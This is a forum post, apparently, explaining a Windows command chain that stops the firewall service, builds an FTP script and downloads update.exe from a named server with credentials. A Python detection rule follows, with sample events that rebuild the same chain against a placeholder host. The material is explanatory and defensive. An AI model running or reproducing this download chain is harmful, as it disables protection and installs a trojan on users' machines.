‽
Join Date: May 2004
Location: near Bremen, Germany
Let's analyze:
- cmd (cmd.exe) is the command-line processor in Windows NT (in DOS / Windows 9x, this was command.com), including Windows XP and Vista. The /c argument tells it to run one specific command and then exit (rather than staying open for further user input).
- net is a facility to manage NT services. stop sharedaccess, then, tells it to stop the service 'sharedaccess'.
- echo, like on Unix, is a way to print out text. The following commands – open ftp.holmenhast.se 21, user ftp.holmenhast.se f1634163f, binary, get update.exe, bye – are a list of FTP commands.
- ftp -n -v -s: which are then passed on to the FTP program. The commands log in to an FTP server with a specific user and download a file named update.exe.
- Finally, net start sharedacc launches the service again.
We can deduce that this update is a replacement service to create a trojan horse, opening a Windows machine for remote access.
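As an added example (not part of the original post), here is one way to flag the command chain analysed above in process-creation logs: the SharedAccess service stopped, an FTP script built with echo, and ftp run with -n and -s:. The rule weights, the threshold, the function names and the sample command lines (placeholder host `ftp.example.test`, script file `x`) are assumptions constructed for this illustration.

```python
import re

# Indicators taken from the command chain analysed in the post above.
# Weights and THRESHOLD are assumptions chosen for this example.
RULES = [
    ("stops_sharedaccess", re.compile(r"\bnet1?(?:\.exe)?\s+stop\s+sharedaccess\b", re.I), 3),
    ("echo_ftp_script", re.compile(r"\becho\s+(?:open|user|binary|get|bye)\b[^&|]*>>?", re.I), 2),
    ("ftp_scripted", re.compile(r"\bftp(?:\.exe)?\b[^&|]*\s-s:", re.I), 3),
    ("ftp_no_autologin", re.compile(r"\bftp(?:\.exe)?\b[^&|]*\s-n\b", re.I), 1),
    ("fetches_exe", re.compile(r"\bget\s+\S+\.exe\b", re.I), 2),
    ("restarts_service", re.compile(r"\bnet1?(?:\.exe)?\s+start\s+sharedacc", re.I), 1),
]
THRESHOLD = 6  # a single indicator (e.g. a legitimate scripted FTP job) stays below this

def score_command_line(cmdline):
    """Return (total score, names of matching rules) for one command line."""
    hits = [(name, weight) for name, rx, weight in RULES if rx.search(cmdline)]
    return sum(w for _, w in hits), [n for n, _ in hits]

def is_suspicious(cmdline):
    return score_command_line(cmdline)[0] >= THRESHOLD

def scan(events):
    """Return (index, score, rule names) for every event at or above THRESHOLD."""
    found = []
    for i, cmdline in enumerate(events):
        score, names = score_command_line(cmdline)
        if score >= THRESHOLD:
            found.append((i, score, names))
    return found

# Constructed sample events; the last one mirrors the structure described in the post.
SAMPLE_EVENTS = [
    "cmd /c echo build finished >> build.log",
    "ftp -s:nightly_upload.txt",
    "cmd /c net stop sharedaccess & echo open ftp.example.test 21 >> x"
    " & echo user USER PASS >> x & echo binary >> x & echo get update.exe >> x"
    " & echo bye >> x & ftp -n -v -s:x & net start sharedaccess",
]

if __name__ == "__main__":
    for index, score, names in scan(SAMPLE_EVENTS):
        print(f"event {index}: score {score}: {', '.join(names)}")
```

Scoring several indicators together keeps a lone scripted FTP job or a lone service stop from raising an alert, while the combination seen in the post does.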